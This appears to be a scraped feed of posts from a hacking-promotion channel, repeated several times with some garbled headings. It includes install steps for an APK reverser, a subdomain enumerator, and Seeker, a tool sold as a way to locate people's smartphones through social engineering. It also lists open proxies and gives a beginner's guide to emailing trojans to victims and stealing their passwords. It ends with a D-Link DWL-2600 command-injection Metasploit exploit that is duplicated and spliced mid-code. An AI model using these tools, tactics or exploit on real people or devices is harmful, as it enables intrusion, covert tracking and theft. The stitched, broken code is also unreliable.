Hardcoded secrets
URL's
Network connections
SSL references
WebView references
๐ฆ อถUะฏ โ โ AT๊อถI
Iฬถอออฬฬฬอฬนฬฑอฬฐฬฬอ NฬธฬฬฬญฬฌฬฌฬอฬฐอฬกอฬฅSฬตออฬฬอฬฬฬบฬฬชTฬดฬ อฬฬ อฬออAฬดออฬฝฬฬอฬฬงฬออฬจฬฌฬ ฬญอฬชLฬถฬอ อฬฬฬฬอฬชLฬถฬฬฬฬฬฬฬอฬญออออฬ ฬดอ อฬฬฃฬฃฬฃอฬอฬจ&ฬตออฬอออฬปอฬงฬจฬฌฬคฬฬชอ ฬตฬฬออฬอฬฬฬฬฬฎอฬฬฒฬคฬRฬดฬออฬพฬอ ฬฏฬฬญฬ ฬฃอฬญฬงUฬดอฬฬฬอฬผฬชอNฬธออฬฬออฬผออ ฬฬฐอ ฬฬฆ
1) git clone https://github.com/1N3/ReverseAPK
2) cd RevereAPK
3) ./install
๐ฆTo use :
reverse-apk <apk_name>
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPREMIUM PROXIES :
t.me/undercodeTesting
103.83.116.226 55443 ID Indonesia elite proxy no yes 1 minute ago
51.158.172.165 8811 FR France anonymous no yes 1 minute ago
51.158.165.18 8811 FR France anonymous no yes 1 minute ago
103.12.161.196 50514 KH Cambodia elite proxy no yes 1 minute ago
51.158.68.68 8811 FR France anonymous no yes 1 minute ago
117.242.36.210 43741 IN India elite proxy no yes 1 minute ago
167.172.188.118 3128 DE Germany elite proxy no yes 1 minute ago
201.64.22.50 8081 BR Brazil anonymous no yes 1 minute ago
94.230.156.143 55167 CZ Czech Republic elite proxy no yes 1 minute ago
94.230.158.37 42057 CZ Czech Republic elite proxy no yes 1 minute ago
51.158.119.88 8811 FR France anonymous no yes 1 minute ago
102.164.199.76 56605 ZA South Africa elite proxy no yes 1 minute ago
151.253.165.70 8080 AE United Arab Emirates elite proxy no yes 1 minute ago
144.217.101.242 3129 CA Canada elite proxy no yes 1 minute ago
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPREMIUM PROXIES :
t.me/undercodeTesting
103.83.116.226 55443 ID Indonesia elite proxy no yes 1 minute ago
51.158.172.165 8811 FR France anonymous no yes 1 minute ago
51.158.165.18 8811 FR France anonymous no yes 1 minute ago
103.12.161.196 50514 KH Cambodia elite proxy no yes 1 minute ago
51.158.68.68 8811 FR France anonymous no yes 1 minute ago
117.242.36.210 43741 IN India elite proxy no yes 1 minute ago
167.172.188.118 3128 DE Germany elite proxy no yes 1 minute ago
201.64.22.50 8081 BR Brazil anonymous no yes 1 minute ago
94.230.156.143 55167 CZ Czech Republic elite proxy no yes 1 minute ago
94.230.158.37 42057 CZ Czech Republic elite proxy no yes 1 minute ago
51.158.119.88 8811 FR France anonymous no yes 1 minute ago
102.164.199.76 56605 ZA South Africa elite proxy no yes 1 minute ago
151.253.165.70 8080 AE United Arab Emirates elite proxy no yes 1 minute ago
144.217.101.242 3129 CA Canada elite proxy no yes 1 minute ago
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 good tool- recommended :
>Accurately Locate Smartphones using Social Engineering
t.me/undercodeTesting
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
A) Kali Linux / Ubuntu / Parrot OS
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 install.sh
4) ./install.sh
B) BlackArch Linux
> pacman -S seeker
C ) Docker
> docker pull thewhiteh4t/seeker
D) Termux
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 termux_install.sh
4) ./termux_install.sh
๐ฆ Usage
> python3 seeker.py -h
usage: seeker.py [-h] [-s SUBDOMAIN]
optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]
# Example
# SERVEO
๐ฆTested by undercode on :
> parrot lastest v
> kali lastest v
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 good tool- recommended :
>Accurately Locate Smartphones using Social Engineering
t.me/undercodeTesting
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
A) Kali Linux / Ubuntu / Parrot OS
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 install.sh
4) ./install.sh
B) BlackArch Linux
> pacman -S seeker
C ) Docker
> docker pull thewhiteh4t/seeker
D) Termux
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 termux_install.sh
4) ./termux_install.sh
๐ฆ Usage
> python3 seeker.py -h
usage: seeker.py [-h] [-s SUBDOMAIN]
optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]
# Example
# SERVEO
๐ฆTested by undercode on :
> parrot lastest v
> kali lastest v
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 The fastest and cross-platform subdomain enumerator
fb.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Subdomains monitoring: put data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 15 seconds (in case of API's timeout).
Parallel support for subdomains resolution, in good network conditions can resolv about 3.5k of subdomains per minute.
DNS over TLS support.
Specific IPv4 or IPv6 query support.
Discover subdomains without brute-force, it tool uses Certificate Transparency Logs and APIs.
Discover only resolved subdomains.
Discover subdomains IP for data analisis.
Read target from user argument (-t) or file (-f).
Write to one unique output file specified by the user all or only resolved subdomains.
Write results to automatically named TXT output file(s).
Hability to query directly the Findomain database created with Subdomains Monitoring for previous discovered subdomains.
Hability to import and work data discovered by other tools.
Quiet mode to run it silently.
Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.
Multiple API support.
Possibility to use as subdomain resolver.
Subdomain wildcard detection for accurate results.
Support for subdomain discover using bruteforce method.
Update checker. Use the --check-updates flag.
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
Installation Android (Termux)
Install the Termux package, open it and follow it commands:
1) $ pkg install rust make perl
2) $ cargo install findomain
3) $ cd $HOME/.cargo/bin
4) $ ./findomain
๐ฆ Installation in Linux using source code
If you want to install it, you can do that manually compiling the source or using the precompiled binary.
Manually: You need to have rust, make and perl installed in your system first.
1) $ git clone https://github.com/Edu4rdSHL/findomain.git
2) $ cd findomain
3) $ cargo build --release
4) $ sudo cp target/release/findomain /usr/bin/
5) $ findomain
๐ฆ Installation in Linux using compiled artifacts
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux
๐ฆIf you are using the ArchLinux distribution or any ArchLinux-based distro, you just need to use:
$ pacman -S findomain
๐ฆ If you are using the Pentoo distribution, you just need to use:
$ emerge -a findomain
๐ฆ Installation Aarch64 (Raspberry Pi)
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64
๐ฆ Installation Windows
Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
Exec: findomain-windows in the CMD shell.
๐ฆInstallation MacOS
You have two options to install Findomain in MacOS.
Using Homebrew:
$ brew install findomain
$ findomain
Manually from the repo:
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms
Installation NixOS
$ nix-env -i findomain
$ findomain
๐ฆInstallation Docker
You have two options to install Findomain in a docker container.
Using Dockerhub:
$ docker pull edu4rdshl/findomain:latest
$ docker run -it edu4rdshl/findomain:latest /bin/bash
$ findomain
๐ฆTested by undercode on
> win 10 pro for workstation lastest
> parrot
@undercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 The fastest and cross-platform subdomain enumerator
fb.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Subdomains monitoring: put data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 15 seconds (in case of API's timeout).
Parallel support for subdomains resolution, in good network conditions can resolv about 3.5k of subdomains per minute.
DNS over TLS support.
Specific IPv4 or IPv6 query support.
Discover subdomains without brute-force, it tool uses Certificate Transparency Logs and APIs.
Discover only resolved subdomains.
Discover subdomains IP for data analisis.
Read target from user argument (-t) or file (-f).
Write to one unique output file specified by the user all or only resolved subdomains.
Write results to automatically named TXT output file(s).
Hability to query directly the Findomain database created with Subdomains Monitoring for previous discovered subdomains.
Hability to import and work data discovered by other tools.
Quiet mode to run it silently.
Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.
Multiple API support.
Possibility to use as subdomain resolver.
Subdomain wildcard detection for accurate results.
Support for subdomain discover using bruteforce method.
Update checker. Use the --check-updates flag.
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
Installation Android (Termux)
Install the Termux package, open it and follow it commands:
1) $ pkg install rust make perl
2) $ cargo install findomain
3) $ cd $HOME/.cargo/bin
4) $ ./findomain
๐ฆ Installation in Linux using source code
If you want to install it, you can do that manually compiling the source or using the precompiled binary.
Manually: You need to have rust, make and perl installed in your system first.
1) $ git clone https://github.com/Edu4rdSHL/findomain.git
2) $ cd findomain
3) $ cargo build --release
4) $ sudo cp target/release/findomain /usr/bin/
5) $ findomain
๐ฆ Installation in Linux using compiled artifacts
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux
๐ฆIf you are using the ArchLinux distribution or any ArchLinux-based distro, you just need to use:
$ pacman -S findomain
๐ฆ If you are using the Pentoo distribution, you just need to use:
$ emerge -a findomain
๐ฆ Installation Aarch64 (Raspberry Pi)
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64
๐ฆ Installation Windows
Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
Exec: findomain-windows in the CMD shell.
๐ฆInstallation MacOS
You have two options to install Findomain in MacOS.
Using Homebrew:
$ brew install findomain
$ findomain
Manually from the repo:
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms
Installation NixOS
$ nix-env -i findomain
$ findomain
๐ฆInstallation Docker
You have two options to install Findomain in a docker container.
Using Dockerhub:
$ docker pull edu4rdshl/findomain:latest
$ docker run -it edu4rdshl/findomain:latest /bin/bash
$ findomain
๐ฆTested by undercode on
> win 10 pro for workstation lastest
> parrot
@undercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Most popular uses for Torjans- for beginers :
t.me/undercodeTesting
๐ฆ Trojan
1) Using trojans is the most stupid and unreliable way for network administrators, but it is suitable for ordinary users, because it is easier for them to plant the server part of the program. Although there are nonprofessionals among administrators, few people come across such jokes.
2) But who said that only they exist on the net? There are still a bunch of simple users with great privileges and a gullible soul. That is precisely what they need to be trojaned.
3) The Trojan program consists of two parts - the client and the server. The server needs to be thrown onto the victim's computer and made it run the file. Most often, the trojan is registered at startup and starts with the OS and is invisible in the system. After that, you connect to the server part using the client and perform the actions laid down in the program, for example, restarting the computer, stealing passwords, etc.
๐ฆ How to throw a trojan? The most common way is a mailbox. Just give the server-side executable some nice name and send a message to the victim.
1) The text of the letter should contain soft, but tempting calls to launch the attached file. This is the same as the spread of viruses, letters with which we see every day in our mailboxes. If the user starts the server part, then consider that you have become the king on his computer. Now you will have access to everything that a war horse can do for you.
2) If the Trojan program is aimed at stealing passwords, then after infection, it can quietly send a message with a password file to a specific E-mail address. Professionals easily find such addresses (using the debugging application), but this all stops. Professional hackers are not stupid, and for Trojans they register mail addresses on free services, and false information about the owner is indicated.
3) An attacker starts up a mailbox or checks it for letters with passwords only through an anonymous proxy server, and it becomes very difficult to find out the real IP address of a person.
4) Trojans have become very widespread due to the fact that it is not easy to calculate the author, subject to simple rules of anonymity. At the same time, using the programs themselves has become a primitive task.
5) The danger posed by trojans is also confirmed by the fact that most anti-virus programs began to scan not only for viruses, but also for trojans. For example, antivirus programs identify Back Orifice as Win32.BO virus.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Most popular uses for Torjans- for beginers :
t.me/undercodeTesting
๐ฆ Trojan
1) Using trojans is the most stupid and unreliable way for network administrators, but it is suitable for ordinary users, because it is easier for them to plant the server part of the program. Although there are nonprofessionals among administrators, few people come across such jokes.
2) But who said that only they exist on the net? There are still a bunch of simple users with great privileges and a gullible soul. That is precisely what they need to be trojaned.
3) The Trojan program consists of two parts - the client and the server. The server needs to be thrown onto the victim's computer and made it run the file. Most often, the trojan is registered at startup and starts with the OS and is invisible in the system. After that, you connect to the server part using the client and perform the actions laid down in the program, for example, restarting the computer, stealing passwords, etc.
๐ฆ How to throw a trojan? The most common way is a mailbox. Just give the server-side executable some nice name and send a message to the victim.
1) The text of the letter should contain soft, but tempting calls to launch the attached file. This is the same as the spread of viruses, letters with which we see every day in our mailboxes. If the user starts the server part, then consider that you have become the king on his computer. Now you will have access to everything that a war horse can do for you.
2) If the Trojan program is aimed at stealing passwords, then after infection, it can quietly send a message with a password file to a specific E-mail address. Professionals easily find such addresses (using the debugging application), but this all stops. Professional hackers are not stupid, and for Trojans they register mail addresses on free services, and false information about the owner is indicated.
3) An attacker starts up a mailbox or checks it for letters with passwords only through an anonymous proxy server, and it becomes very difficult to find out the real IP address of a person.
4) Trojans have become very widespread due to the fact that it is not easy to calculate the author, subject to simple rules of anonymity. At the same time, using the programs themselves has become a primitive task.
5) The danger posed by trojans is also confirmed by the fact that most anti-virus programs began to scan not only for viruses, but also for trojans. For example, antivirus programs identify Back Orifice as Win32.BO virus.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ TESTED BY UNDERCODE 2020 BUG
D-LINK 2020 Authenticated Remote Command Injection
t.me/undercodeTesting
This module requires Metasploit: https://metasploit.com/download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
๐ฆ TESTED BY UNDERCODE 2020 BUG
D-LINK 2020 Authenticated Remote Command Injection
t.me/undercodeTesting
This module requires Metasploit: https://metasploit.com/download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
end
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
if target.name =~ /CMD/
unless datastore['CMD']
end
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ